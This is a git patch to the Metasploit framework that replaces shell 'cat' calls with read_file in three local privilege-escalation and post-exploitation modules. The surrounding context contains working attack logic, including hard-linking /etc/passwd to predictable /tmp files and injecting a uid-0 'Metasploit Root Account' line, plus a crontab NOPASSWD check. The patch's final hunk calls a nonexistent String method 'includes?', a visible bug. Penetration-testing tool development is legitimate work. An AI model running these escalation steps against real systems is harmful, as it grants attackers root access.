From 2272e15ca2bcfb0f268c9dd6716413cc76d4901b Mon Sep 17 00:00:00 2001 From: jvoisin Date: Thu, 29 Sep 2016 00:15:01 +0200 Subject: [PATCH] Remove some anti-patterns, in the same spirit than #7372 --- modules/exploits/linux/local/netfilter_priv_esc.rb | 2 +- modules/exploits/osx/local/rsh_libmalloc.rb | 2 +- modules/post/multi/escalate/metasploit_pcaplog.rb | 6 +++--- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/local/netfilter_priv_esc.rb b/modules/exploits/linux/local/netfilter_priv_esc.rb index 1332a75137..174200e7c5 100644 --- a/modules/exploits/linux/local/netfilter_priv_esc.rb +++ b/modules/exploits/linux/local/netfilter_priv_esc.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local def shemsham_installed?() # we want this to be false. vprint_status('Checking if shem or sham are installed') - shemsham = cmd_exec('cat /proc/cpuinfo') + shemsham = read_file('/proc/cpuinfo') if shemsham.include?('shem') print_error('shem installed, system not vulnerable.') elsif shemsham.include?('sham') diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb index 552003fd13..07ed515ebb 100644 --- a/modules/exploits/osx/local/rsh_libmalloc.rb +++ b/modules/exploits/osx/local/rsh_libmalloc.rb @@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Now to check whether the script worked...") # Check whether it worked - crontab = cmd_exec("cat /etc/crontab") + crontab = read_file("/etc/crontab") vprint_status("Reading crontab yielded the following response: #{crontab}") unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL" vprint_error("Bad news... it did not write to the file.") diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 4466a0e513..558b886fa1 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post def run print_status "Setting up the victim's /tmp dir" - initial_size = cmd_exec("cat /etc/passwd | wc -l") + initial_size = read_file("/etc/passwd").lines.count print_status "/etc/passwd is currently #{initial_size} lines long" i = 0 j = 0 @@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})" cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") end - current_size = cmd_exec("cat /etc/passwd | wc -l") + current_size = read_file("/etc/passwd").lines.count if current_size == initial_size # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" @@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post i = (i+1) % 60 # increment second counter end - if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") + if read_file("/etc/passwd").includes?("Metasploit") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") # TODO: Consider recording our now-created username and password as a valid credential here. else